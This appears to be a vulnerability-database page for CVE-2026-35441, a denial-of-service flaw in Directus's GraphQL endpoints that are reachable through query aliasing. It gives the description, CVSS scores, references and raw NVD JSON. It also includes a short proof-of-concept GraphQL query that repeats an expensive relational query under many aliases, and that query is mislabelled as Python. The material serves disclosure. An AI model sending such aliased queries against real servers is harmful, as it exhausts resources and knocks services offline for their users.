CVE-2026-35441

Description

Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus' GraphQL endpoints (/graphql and /graphql/system) did not deduplicate resolver invocations within a single request. An authenticated user could exploit GraphQL aliasing to repeat an expensive relational query many times in a single request, forcing the server to execute a large number of independent complex database queries concurrently, multiplying database load linearly with the number of aliases. The existing token limit on GraphQL queries still permitted enough aliases for significant resource exhaustion, while the relational depth limit applied per alias without reducing the total number executed. Rate limiting is disabled by default, meaning no built-in throttle prevented this from causing CPU, memory, and I/O exhaustion that could degrade or crash the service. Any authenticated user, including those with minimal read-only permissions, could trigger this condition. This vulnerability is fixed in 11.17.0.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:* - VULNERABLE

Directus < 11.17.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-35441
# Exploits GraphQL aliasing to multiply resolver invocations
# Send this to /graphql or /graphql/system with a valid auth token

query Exploit {
  # Repeating the same expensive relational query 50 times using aliases
  a1: articles { id title author { name } }
  a2: articles { id title author { name } }
  a3: articles { id title author { name } }
  a4: articles { id title author { name } }
  a5: articles { id title author { name } }
  # ... repeat up to the token limit or desired exhaustion level
  a50: articles { id title author { name } }
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35441
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35441
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35441/
[4] VulDB https://vuldb.com/cve/CVE-2026-35441
[5] https://github.com/directus/directus/security/advisories/GHSA-ph52-67fq-75wj

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35441", "sourceIdentifier": "[email protected]", "published": "2026-04-06T22:16:22.697", "lastModified": "2026-04-20T16:34:49.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus' GraphQL endpoints (/graphql and /graphql/system) did not deduplicate resolver invocations within a single request. An authenticated user could exploit GraphQL aliasing to repeat an expensive relational query many times in a single request, forcing the server to execute a large number of independent complex database queries concurrently, multiplying database load linearly with the number of aliases. The existing token limit on GraphQL queries still permitted enough aliases for significant resource exhaustion, while the relational depth limit applied per alias without reducing the total number executed. Rate limiting is disabled by default, meaning no built-in throttle prevented this from causing CPU, memory, and I/O exhaustion that could degrade or crash the service. Any authenticated user, including those with minimal read-only permissions, could trigger this condition. This vulnerability is fixed in 11.17.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "11.17.0", "matchCriteriaId": "F2EBB337-0000-4792-940F-DAEFCFC17747"}]}]}], "references": [{"url": "https://github.com/directus/directus/security/advisories/GHSA-ph52-67fq-75wj", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}